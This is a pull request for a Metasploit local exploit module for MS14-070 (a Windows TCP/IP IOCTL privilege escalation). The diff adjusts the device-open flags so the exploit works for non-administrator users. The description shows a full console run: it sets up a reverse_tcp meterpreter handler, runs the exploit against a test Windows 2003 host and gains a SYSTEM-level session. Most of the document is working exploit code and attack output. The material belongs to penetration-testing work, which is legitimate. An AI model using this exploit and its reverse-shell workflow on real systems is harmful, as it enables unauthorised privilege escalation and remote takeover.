### PR TITLE
Fixed open device issue for non-priv users

### DIFF
--- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
+++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Local
       return Exploit::CheckCode::Safe
     end
 
-    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    handle = open_device('\\\\.\\tcp', 0, 'FILE_SHARE_READ', 'OPEN_EXISTING')
     return Exploit::CheckCode::Safe unless handle
 
     session.railgun.kernel32.CloseHandle(handle)
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
     end
 
-    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    handle = open_device('\\\\.\\tcp', 0, 'FILE_SHARE_READ', 'OPEN_EXISTING')
     if handle.nil?
       fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
     end


### PR DESCRIPTION
Fixed the open_device call to work for users without Administrator
privileges

Example run:

<pre>
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp                                                                     
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.2.2                                                                                              
LHOST => 10.0.2.2
msf exploit(handler) > set LPORT 4445                                                                                                  
LPORT => 4445
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     10.0.2.2         yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set ExitOnSession false                                                                                         
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 10.0.2.2:4445
[*] Started reverse handler on 0.0.0.0:4445
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (770048 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4445 -> 127.0.0.1:54433) at 2015-02-18 12:41:59 -0500

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  WIN2K3TEST\kore @ WIN2K3TEST  127.0.0.1:4445 -> 127.0.0.1:54433 (127.0.0.1)

msf exploit(handler) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf exploit(ms14_070_tcpip_ioctl) > set SESSION 1
SESSION => 1
msf exploit(ms14_070_tcpip_ioctl) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.:4444
msf exploit(ms14_070_tcpip_ioctl) > [*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (770048 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:36587) at 2015-02-18 12:43:02 -0500                                      
msf exploit(ms14_070_tcpip_ioctl) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  WIN2K3TEST\kore @ WIN2K3TEST      127.0.0.1:4445 -> 127.0.0.1:54433 (127.0.0.1)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2K3TEST  127.0.0.1:4444 -> 127.0.0.1:36587 (127.0.0.1)

msf exploit(ms14_070_tcpip_ioctl) >
</pre>
